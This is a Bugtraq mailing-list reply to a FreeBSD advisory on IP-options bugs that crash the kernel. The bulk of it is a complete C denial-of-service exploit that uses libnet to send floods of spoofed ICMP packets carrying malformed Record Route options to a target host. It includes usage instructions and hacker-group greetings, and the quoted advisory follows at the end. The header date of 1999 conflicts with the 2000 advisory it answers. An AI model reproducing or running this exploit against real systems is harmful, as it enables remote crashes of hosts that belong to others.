Return-Path: owner-bugtraq@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID:  <Pine.LNX.4.10.9901131941520.12717-100000@rast.lodz.pdi.net>
Date:         Wed, 13 Jan 1999 19:50:08 +0100
Reply-To: yeti <y3t1@RAST.LODZ.PDI.NET>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: yeti <y3t1@RAST.LODZ.PDI.NET>
Subject:      Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <20000622215052.D642E37BF12@hub.freebsd.org>

#include <stdio.h>
#include <libnet.h>
/* Remote denial-of-service in IP stack
   simple exploit by y3t1
                     y3t1@rast.lodz.pdi.net

Gretzzz : rastlin,z33d,vanitas,DYZIU,Kuki,vx,zx,korie,kaneda,
          d3cker&mroowka,jarv33s,funkySh,Shadow,tmoggie
	  all from :
	           #hwa.hax0r.news@efnet
	           #darnet@efnet
*/
int rand_n(u_long zakres)
{
  return 1+(int) ((float)zakres*rand()/(RAND_MAX+1.0));
}

int main(int argc, char **argv)
{
    char a;
    int sock, c,pkt,ile;
    struct hostent *host;
    u_long src_ip, dst_ip;
    u_char *buf;
    u_char options[4];
    int option_s  = sizeof(options);
    struct ipoption ipopt;
    srand(time(NULL));
    ile=100;
    printf("  -= Remote denial-of-service in IP stack =- \n");
    printf("\n");
    printf("                          by y3t1/team140\n");
    printf("                             y3t1@rast.lodz.pdi.net \n");
    printf("\n");
    if  (argc < 4)
    {
     printf("%s -s src_addr -d dst_addr -p packets\n",argv[0]);
     printf(" -s src_addr - source address \n");
     printf(" -d dst_addr - dest address \n");
     printf(" -p packets - how many packets send to dest (default 100)\n");
     exit(1);
    }
   opterr=0;
   while((a=getopt(argc,argv,"s:d:p:"))!=EOF)
   {
	switch(a) {
	 case 's': {
	           if ((host=gethostbyname(optarg))!=NULL)
		   bcopy(host->h_addr,&src_ip,host->h_length);
		   else src_ip=inet_addr(optarg);
		   break;
		   }
	 case 'd': {
	           if ((host=gethostbyname(optarg))!=NULL)
		   bcopy(host->h_addr,&dst_ip,host->h_length);
		   else dst_ip=inet_addr(optarg);
	      	   break;
                   }
         case 'p': {
	            ile=atoi(optarg);
		    break;
		   }
	 }
   }
    bzero(options,option_s);
    buf = malloc(IP_MAXPACKET);
    if (!buf)
    {
        perror("malloc");
        exit(-1);
    }
    sock = libnet_open_raw_sock(IPPROTO_RAW);
    if (sock == -1)
    {
        perror("socket");
        exit(-1);
    }
    libnet_build_ip(LIBNET_ICMP_H ,0,242,0,48,IPPROTO_ICMP,src_ip,dst_ip,NULL,0,buf);
    memcpy(ipopt.ipopt_list, options, option_s);
    *(ipopt.ipopt_list)     = IPOPT_RR;
    *(ipopt.ipopt_list+1)   = 3;
    *(ipopt.ipopt_list+2)   = 0xff;
    *(ipopt.ipopt_list+3)   = 0;
    c = libnet_insert_ipo(&ipopt,option_s,buf);
    if (c == -1)
    {
        printf("Error\n");
	exit(1);
    }
    libnet_build_icmp_echo(ICMP_ECHO,0,242,31337,NULL,0,buf+LIBNET_IP_H+option_s);
    if (libnet_do_checksum(buf,IPPROTO_ICMP,LIBNET_ICMP_ECHO_H)==-1)
    {
     printf("can't do checksum \n");
    }
 for (pkt=0;pkt<ile;pkt++)
 {
    buf[22]=rand_n(0xff);
    c = libnet_write_ip(sock, buf, LIBNET_ICMP_ECHO_H + LIBNET_IP_H + option_s);
 }
    free(buf);
    libnet_close_raw_sock(sock);
}

On Thu, 22 Jun 2000, FreeBSD Security Advisories wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Topic:		Remote denial-of-service in IP stack
>
> Category:	core
> Module:	kernel
>
> There are several bugs in the processing of IP options in the FreeBSD
> IP stack, which fail to correctly bounds-check arguments and contain
> other coding errors leading to the possibility of data corruption and
> a kernel panic upon reception of certain invalid IP packets.
>